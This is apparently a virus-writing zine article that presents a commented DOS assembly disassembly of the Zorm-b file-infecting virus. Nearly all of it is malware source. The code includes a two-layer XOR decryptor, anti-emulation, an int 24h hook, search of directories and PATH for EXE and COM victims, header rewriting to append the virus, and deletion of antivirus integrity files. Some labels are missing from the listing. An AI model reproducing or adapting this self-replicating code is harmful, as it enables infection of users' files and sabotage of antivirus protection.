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SLAM4.038: Zorm-B disassembled by Yesna/SLAM

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Published in 
 · 3 Mar 2022

Zorm-b Virus
disassembled by Yesna/SLAM

Zorm-b is a 1117 byte direct parasitic exe/com virus, using one static decryption, encryption algorithm with random crypt keys. First it decrypts the setup part of the second layer, which then decrypts the rest of the virus. Zorm-b has a fixed anti-emulation routine and hooks interrupt 24h. Zorm-b infects via Findfirst and Findnext and will only infect 4 files when executed (2 exe/2 com). Zorm-b will infect files specified in PATH and is able to change directory. Zorm-b is able to infect com ENUNS files by adding its size to the ENUNS section, causing no system shutdown.

Greetz to Darkman/29a...

.model tiny 
org 100h

jmp begin ;Used to save com return code
nop ;At offset 100h

xor dx, dx ;Anti-emulation routine
mov cx, 11h ;AL = 2 if not emulated
mov ah, 3dh ;Open file...
int 21h

first_key equ byte ptr $+1 ;Holds first crypt key
add al, 0feh ;AL = 2 + first_key

first_offset equ word ptr $+1 ;Crypts the secnond layer setup
mov bx, 00h ;BX = Crypt offset

xor byte ptr cs:[bx], al ;Simple XOR cryptor
inc bx ;BX = Next byte to crypt
loop crypt_routine ;Loop 1. CX = 11h 2. CX = 436h

nop ;Will contain a RET instruction

mov byte ptr cs:[second_layer-01h], 0C3h ;Save RET in NOP

second_offset equ word ptr $+1 ;Crypts rest of the virus
mov bx, 00h ;BX = Second crypt offset

second_key equ byte ptr $+1 ;Second crypt key
mov al, 00h ;AL = Second key
mov cx, (crypt_end-real_start) ;Crypt CX bytes
call crypt_routine ;Call cryptor

mov ax, ss ;AX = SS
mov cx, cs ;CX = CS
cmp ax, cx ;Is diz an exe or com file?
jz restore_com ;If SS = CS then com file

cli ;Disable interrupts
mov ax, ss ;AX = SS
dec ax ;AX = SS - 1
mov ss, ax ;SS = AX = SS - 1
sti ;Enable interrupts

call delta_offset ;Get delta offset

push ds ;Save DS on stack
push cs ;Save CS on stack
pop ds ;DS = CS

mov byte ptr [host][bp], 0 ;0 = Exe, 1 = Com file

jmp short restore_exe ;Jump to restore exe code...

push ds ;Save DS on stack
call delta_offset ;Get delta offset
mov byte ptr [host][bp], 1 ;1 = Com, 0 = Exe file

pop ax ;AX = DS
mov word ptr [old_ds][bp], ax ;Save DS in variable

push es ;Save ES on stack
push cs ;Save CS on stack
pop es ;ES = CS

cmp byte ptr [host][bp], 1 ;Is diz a com file?
jnz modify_restore_exe ;If host = 1 then yes

lea si, [com_return+04h][bp] ;SI = Offset of COM return
mov di, 100h ;DI = Start of COM file
jmp short grab_int24 ;Jumps to int 24h grabber

lea si, [exe_cs_ip][bp] ;SI = Original exe CS/IP
lea di, [jump_exe][bp] ;DI = Offset of EXE return
movsw ;Copy original exe CS/IP to
movsw ;Exe jump, restore code.

movsw ;Copy 4 bytes for either com or
movsw ;exe return.
pop es ;ES = ES

lea dx, [dta_buffer][bp] ;DX = Offset to store DTA info
call set_dta ;Set DTA to point into our buf.

mov byte ptr [com_exe_search][bp], 45h ;Infect 2 exe first

push es ;Save ES on stack
mov ax, 3524h ;Get int 24h addy
int 21h

mov word ptr [old_int24][bp], bx ;Save offset of int 24h
mov word ptr [old_int24+2][bp], es ;Save segment of int 24h

mov ah, 25h ;Hook int 24h
lea dx, [handle_int24][bp] ;DX = Offset of int 24h handler
int 21h

pop es ;ES = ES

mov byte ptr [infected][bp], 0 ;Reset infected count

mov ah, 47h ;Get directory
lea si, [dir_buffer][bp] ;SI = Variable for dir. info
xor dl, dl ;DL = 0 = Default drive
int 21h

mov ah, 19h ;Get current drive
int 21h
mov byte ptr [default_drive][bp], al;Save drive in variable

cmp al, 2 ;Is it drive C:?
jz drive_c ;Yes! Ok, only infect HDD

mov dl, 2 ;Set current drive as C:
mov ah, 0Eh ;Set drive...
int 21h

mov ax, word ptr es:[2ch] ;AX = Enviroment segment
mov es, ax ;ES = Enviroment variables

xor di, di ;DI = 0
mov si, di ;SI = DI = 0
jmp short find_path ;Jump find PATH routine

inc si ;SI = SI + 1
mov di, si ;DI = Search for PATH, next byte

mov ax, 4150h ;AX = 'AP'
scasw ;Compare AX with ES:DI
jnz not_matching ;If not found then search again

mov ax, 4854h ;AX = 'TH'
scasw ;Compare AX with ES:DI
jnz not_matching ;If not found the search again

mov al, 3Dh ;AL = '='
scasb ;CompareAL with ES:DI
jnz not_matching ;If not found the search again

call findfirst ;Find the first to infect

jb no_file_found ;Change dir. if no files found
call test_file ;Test file, infected? NewEXE?...

cmp byte ptr [infected][bp], 2 ;Infect max. 2 files
jz exit ;Equal? Then stop infection

call findnext ;Find the next file to infect
jmp short try_again ;Jumps to try_again

call change_directory ;Change directory
jnb find_file ;Find victim, if we succeed...

call infect_path ;Infect file specified in PATH
jnz find_file ;Find victim in PATH and infect

jmp short exit ;No files found...

mov ax, 3d02h ;Open file in read/write
lea dx, [dta_buffer+1eh][bp] ;DX = File name in DTA buffer
int 21h

xchg ax, bx ;AX = BX = File handle
mov ah, 3fh ;Read file...
mov cx, 1ch ;Read CX bytes
lea dx, [buffer][bp] ;DX = Offset of header buffer
int 21h

cmp word ptr [buffer][bp], 5a4dh ;Is diz an exe or com?
jz test_exe ;Equal? Then its an exe...

cmp word ptr [buffer][bp], 4d5ah ;Is diz an exe or com?
jnz infect_com ;Not equal? Then its a com

cmp word ptr [buffer+12h][bp], 5649h ;Already infected?
jz dont_infect ;Yes? Then dont infect

cmp word ptr [buffer+1ah][bp], 0 ;Overlay file?
jnz dont_infect ;Not qual? Dont infect...

cmp word ptr [buffer+18h][bp], 40h ;NewEXE file?
jz dont_infect ;Equal? Dont infect...

mov byte ptr [exe_or_com][bp], 0 ;Infecting a exe file.
jmp short infect ;Jump to infection routine

cmp byte ptr [buffer+03h][bp], 56h ;Already ready infected?
jz dont_infect ;Yes? Then dont infect

push di ;Save DI on stack
push es ;Save ES on stack
push cs ;Save CS on stack
pop es ;ES = CS

mov byte ptr [exe_or_com][bp], 1 ;Infecting a com file?

jmp short com_return_code ;Jump to com_return_code

jmp return_to_host ;jump to restore_to_host

lea si, [buffer][bp] ;SI = Header of file...
lea di, [com_return+04h][bp] ;DI = Com return routine

movsw ;Copy 4 bytes to ES:DI, save
movsw ;original com header in buffer

pop es ;ES = ES
pop di ;DI = DI

mov ax, 4300h ;Get file attributes...
lea dx, [dta_buffer+1eh][bp] ;DX = File name in DTA
int 21h

mov word ptr [file_attrib][bp], cx ;Save file attribute

lea dx, [dta_buffer+1eh][bp] ;DX = File name in DTA
call set_attrib ;Set new attributes for file

lea dx, [anti_vira][bp] ;DX = AV files
call set_attrib ;Set new attributes for AV file

call delete_file ;Delete AV file
jmp short proceed_infect ;Jump to proceed_infect

jmp close_file ;Jump to close_file

lea dx, [anti_vira+0ch][bp] ;DX = Next AV file
call set_attrib ;Set new attributes for AV file
call delete_file ;Delete the AV file

lea dx, [anti_vira+19h][bp+556h] ;DX = Next AV file
call set_attrib ;Set new attributes for AV file
call delete_file ;Delete AV file

mov ax, 5700h ;Get date/time of file
int 21h

push cx ;Save CX on stack
push dx ;Save DX on stack

cmp byte ptr [exe_or_com][bp], 1 ;Infecting a com file?
jz com_file ;Equal? Then its a com

mov ax, word ptr [buffer+0eh][bp];AX = SS of file in header
mov word ptr [exe_ss_sp+2][bp], ax ;Save AX (SS) in return.

mov ax, word ptr [buffer+10h][bp];AX = SP of file in header
mov word ptr [exe_ss_sp][bp], ax ;Save AX (SP) in return.

mov ax, word ptr [buffer+14h][bp];AX = IP of file in header
mov word ptr [exe_cs_ip][bp], ax ;Save AX (IP) in return.

mov ax, word ptr [buffer+16h][bp];AX = CS of file in header
mov word ptr [exe_cs_ip+2][bp], ax ;Save AX (CS) in return.

call seek_eof ;Goto EOF

cmp byte ptr [exe_or_com][bp], 1 ;Infecting a com file?
jnz calculate_exe ;Not equal? Then calculate exe

sub ax, 7 ;Sub AX with 7
xchg ax, dx ;DX = AX = Offset EOF - 7
mov cx, 0 ;CX = 0
mov ax, 4200h ;Goto EOF - 7 = ENUNS section of
int 21h ;com file

mov ah, 3Fh ;Read file...
mov cx, 7 ;Read CX bytes (ENUNS Info)
lea dx, [second_copy+(crypt_end-begin)][bp];DX = 7 byte Buf
int 21h

add word ptr [second_layer+(crypt_end-begin+5)][bp], 463h
;Add virus size to ENUNS info

call seek_eof ;Goto EOF

mov cx, ax ;CX = AX = Offset of EOF
sub ax, 3 ;AX = Offset of EOF - 3
mov word ptr [com_return+01h][bp], ax ;Save jump offset
add cx, 100h ;CX = Offset EOF + 100h

jmp short setup_crypt_offs ;Jump to setup_crypt_offs

push ax ;Save AX on stack
push dx ;Save DX on stack
push ax ;Save AX on stack

mov ax, word ptr [buffer+08h][bp];AX = Header size in para.
mov cl, 4 ;Convert to byte sized
shl ax, cl ;Shift 4 bits left
mov cx, ax ;CX = AX = Header size

pop ax ;AX = File size (offset)

sub ax, cx ;AX = File size - header
sbb dx, 0 ;DX = Segment pointer

mov cl, 0Ch ;Convert DX to new segment
shl dx, cl ;Shift 12 bits left

mov cl, 4 ;Convert AX to new offset
push ax ;Save AX on stack
shr ax, cl ;Shift AX 4 bits right
add dx, ax ;DX = Seg. + AX = Size in para
shl ax, cl ;AX = New offset

pop cx ;CX = AX = File size - header

sub cx, ax ;CX = New IP

mov word ptr [buffer+14h][bp], cx ;Save new IP in buffer
mov word ptr [buffer+16h][bp], dx ;Save new CS in buffer
inc dx ;Increment DX
mov word ptr [buffer+0eh][bp], dx ;Save new SS in buffer

mov word ptr [buffer+10h][bp], 0a00h ;Save new SP in buffer
mov word ptr [buffer+0ah][bp], 0a0h ;Save new MinMem in buf
mov word ptr [buffer+12h][bp], 5649h ;Save infection stamp

push cx ;Save CX on stack
add cx, 26h ;CX + 26h = Offset for cryptor
mov [second_offset][bp], cx;Save CX in buffer
pop cx ;CX = New IP

push cx ;Save CX on stack
add cx, 14h ;CX = Offset for RET instruction
mov word ptr [second_layer+03h][bp], cx ;Save CX in buffer
pop cx ;CX = New IP

add cx, 15h ;CX + 15h = Offset for cryptor
mov word ptr [first_offset][bp], cx ;Save CX in buf.

cmp byte ptr [exe_or_com][bp], 1 ;Com or exe file?
jz crypt ;Equal? Then jump to setup

pop dx ;DX = Segment of file size
pop ax ;AX = Offset of file size
add ax, 45Ch ;AX = Offset + virus
adc dx, 0 ;DX = Segment + 1, if carry set

mov cx, 200h ;Convert file size to
div cx ;512 byte pages
cmp dx, 0 ;Is DX = 0?
jz dont_inc_page ;Equal? then jump...

inc ax ;AX = File size in 512 byte page

mov word ptr [buffer+04h][bp], ax ;Save number of 512 pages
mov word ptr [buffer+02h][bp], dx ;Save bytes in last page

call setup_encryptor ;Copy virus and encrypt it.

lea si, [second_copy+(second_layer-begin)][bp];Start offset
mov cx, (crypt_end-second_layer) ;Number of byte to search

cmp byte ptr [si], 0CDh ;Search for a Int call (CDh)
jz crypt ;Found? Then crypt again
inc si ;SI = Next byte to search
loop find_start ;Loop CX times

mov byte ptr [second_copy+(second_layer-begin)-1][bp], 90h
;Delete RET inst. in crypt rou.

mov ah, 40h ;Write to file...
mov cx, (crypt_end-begin+7) ;Number to write (CX)
lea dx, [second_copy][bp] ;DX = Encrypted virus offset
int 21h

mov ax, 4200h ;Goto SOF
xor cx, cx ;CX = 0
cwd ;DX = 0
int 21h

cmp byte ptr [exe_or_com][bp], 1 ;Com or exe file?
jnz write_exe_header ;Not equal? Then write exe

lea dx, [com_return][bp] ;DX = Com return code
mov cx, 4 ;Write 4 bytes to file
jmp short write_com_header ;Jump to write_com_header

mov cx, 1Ah ;Write 1Ah bytes to file
lea dx, [buffer][bp] ;DX = Exe buffer (header)

mov ah, 40h ;Write to file (exe/com header)
int 21h

inc byte ptr [infected][bp] ;Inc. number of files infected
mov cx, word ptr [file_attrib][bp] ;CX = File attributes
lea dx, [dta_buffer+1eh][bp];DX = File name in DTA

mov ax, 4301h ;Restore file attributes
int 21h

mov ax, 5701h ;Save date/time stamp
pop dx ;DX = Date stamp of file
pop cx ;CX = Time stamp of file
int 21h

mov ah, 3Eh ;Close file
int 21h

ret ;Return to caller...

mov dl, byte ptr [default_drive][bp];DL = Original drive
mov ah, 0Eh ;Set current drive
int 21h

mov ah, 3Bh ;Change directory
mov byte ptr [backslash][bp], '/';Save a '/' in buffer
lea dx, [backslash][bp] ;DX = Original directory
int 21h

cmp byte ptr [com_exe_search][bp], 'C';Both exe and com?
jz restore ;Not eqaul? Then infect com

mov byte ptr [com_exe_search][bp], 'C' ;Infect com now
jmp get_directory ;Jump to get_directory

mov ax, word ptr [old_ds][bp] ;AX = DS = PSP
push ax ;Save AX on stack
pop ds ;DS = DS = PSP

mov dx, 80h ;DX = PSP + 80h = Our file DTA
call set_dta ;Set DTA to our file

push ds ;Save DS on stack
mov ax, 2524h ;Restore original int 24h
lds dx, [old_int24][bp] ;DX = Original addy
int 21h

pop ds ;DS = DS = PSP
push ds ;Save DS on stack
pop es ;ES = DS = PSP
cmp byte ptr [host][bp], 1 ;Is diz an exe or com file
jnz exit_exe ;Not equal? Then its exe

mov ax, 100h ;AX = Com start...
push ax ;Save AX on stack
ret ;Jump back to host...(AX)

mov ax, es ;AX = ES = PSP
add ax, 10h ;AX = PSP + 10h

add word ptr cs:[jump_exe+02h][bp], ax ;Save CS in jump

cli ;Disable interrupts
add ax, word ptr cs:[jump_exe+06h][bp] ;AX = Original SS
mov ss, ax ;SS = AX = Original SS
mov sp, word ptr cs:[jump_exe+04h][bp] ;Original SP
sti ;Enable interrupts

db 0eah ;Jump opcode
jump_exe dd 0000F0FFh ;Place to jump to...
dd 0000F0FFh ;Contains original SS/SP
exe_cs_ip dd 00000000h ;Store original CS/IP
exe_ss_sp dd 00000000h ;Store original SS/SP

mov ah, 4Eh ;Find first file...

cmp byte ptr [com_exe_search][bp], 'C';com or exe search?
jnz try_exe_search ;Not equal? Search for exe

lea dx, [com_filemask][bp] ;DX = Com filemask
jmp short start_search ;Jump to start_search

lea dx, [exe_filemask][bp] ;DX = Exe filemask

mov cx, 7 ;File attribute
int 21h

ret ;Return to caller...

mov ah, 4Fh ;Find next matching file
int 21h

ret ;Return to caller...

mov ah, 3Bh ;Change directory...
lea dx, [upper_dir][bp] ;DX = Upper directory
int 21h

ret ;Return to caller...

lea si, [path_dir][bp] ;SI = Path info...

cmp byte ptr es:[di], 3Bh ;Found '='?
jz path_found ;Yes? Then jump to path_...

cmp byte ptr es:[di], 0 ;Is ES:DI = 0?
jz clear_ax ;Yes? Then jump to clear_ax...

mov ah, byte ptr es:[di] ;AH = Byte in ES:DI
mov byte ptr [si], ah ;Save AH in buffer...
inc di ;Increment DI
inc si ;Increment SI
jmp short find_file_in_path ;Jump to find_path...

mov byte ptr [si], 0 ;Reset '=' in buffer
inc di ;Increment DI
mov ah, 3Bh ;Change directory
lea dx, [path_dir][bp] ;DX = Buffer of directory
int 21h

ret ;Return to caller...

xor ax, ax ;AX = 0
ret ;Return to caller...

push ax ;Save AX on stack
push bx ;Save BX on stack
mov al, byte ptr [second_key][bp] ;AL = Second crypt key
inc al ;AL = Second crypt key + 1

cmp al, 0 ;Is AL = 0?
jnz dont_inc ;No? Then dont increment

inc al ;Increment AL if = 0

mov byte ptr [second_key][bp], al ;Save AL as new second key
mov ah, byte ptr [first_key][bp] ;AH = First crypt key
inc ah ;AH = First crypt key + 1

cmp ah, 0 ;Is AH = 0?
jnz crypt_virus_in_space ;No? Then dont increment

inc ah ;Increment AH if = 0

mov byte ptr [first_key][bp], ah ;Save AH as new first key

push di ;Save DI on stack
push es ;Save ES on stack
push cs ;Save CS on stack
pop es ;ES = CS

lea si, [begin][bp] ;SI = Start of virus
lea di, [second_copy][bp] ;DI = Area to put crypted virus
mov cx, (crypt_end-begin) ;Copy CX bytes
rep movsb ;Copy DS:SI to ES:DI...

pop es ;ES = ES
pop di ;DI = DI
mov cx, (crypt_end-real_start) ;CX = Number to crypt
lea bx, [second_copy+(real_start-begin)][bp] ;BX = Offset..

call crypt_routine ;Call crypt_routine

xchg al, ah ;AH = AL, AL = AH
inc al ;AL = AL + 1
inc al ;AL = AL + 1
mov cx, (real_start-second_layer) ;CX = Number to crypt
lea bx, [second_copy+(second_layer-begin)][bp] ;BX = Offset

call crypt_routine ;Call crypt_routine

pop bx ;BX = File handler
pop ax ;AX = Nubmer of bytes in
ret ;Return to caller...

mov ax, 4301h ;Set file attributes
xor cx, cx ;CX = 0 = No attributes
int 21h

ret ;Return to caller...

mov ah, 41h ;Delete file...
int 21h

ret ;Return to caller...

mov al, 03h ;AL = Critical error hand..
iret ;Return from DOS

mov ah, 1Ah ;Set DTA...
int 21h

ret ;Return to caller...

call calc_delta ;Call calc_delta

pop bp ;BP = Return from CALL
sub bp, (calc_delta-start+100h) ;BP = Delta offset
ret ;Return to caller...

mov ax, 4202h ;Goto EOF
xor cx, cx ;CX = 0
cwd ;DX = 0 if AX < 8000h
int 21h

ret ;Return to caller...

virus_name db '(c)Zorm-b',0 ;Virus name...
author db 'by Dr.L' ;Virus creator...
db 0e9h ;Jump opcode
dw 00h ;addy to jump to
push si ;Infection mark...'V'
nop ;Do nutthin...
nop ;Do nutthin...
int 20h ;Terminate from com file

db 'anti-vir.dat',0 ;Deletes these av files...
db '',0
db 'chklist.cpe',0

upper_dir db '..',0 ;Used to get to upper directory

exe_filemask db '*.exe',0 ;Used to search for exe file
com_filemask db '*.com',0 ;Used to search for com file


exe_or_com db ? ;Determine wether its exe/com
host db ? ;Is host a com or an exe file?
com_exe_search db ? ;Search for both com/exe
default_drive db ? ;Current drive
file_attrib dw ? ;File attributes
old_int24 dd ? ;Original int 24h addy
old_ds dw ? ;Original DS register
infected db ? ;Number of infected files
backslash db ? ;Used to get back to dir.
dir_buffer db 40h dup(?) ;Current directory
buffer db 1ch dup(?) ;File header buffer
dta_buffer db 2bh dup(?) ;DTA info about file...
path_dir db 40h dup(?) ;Directory in PATH

db (crypt_end-begin+7) dup(?) ;Area to put crypted copy


end start

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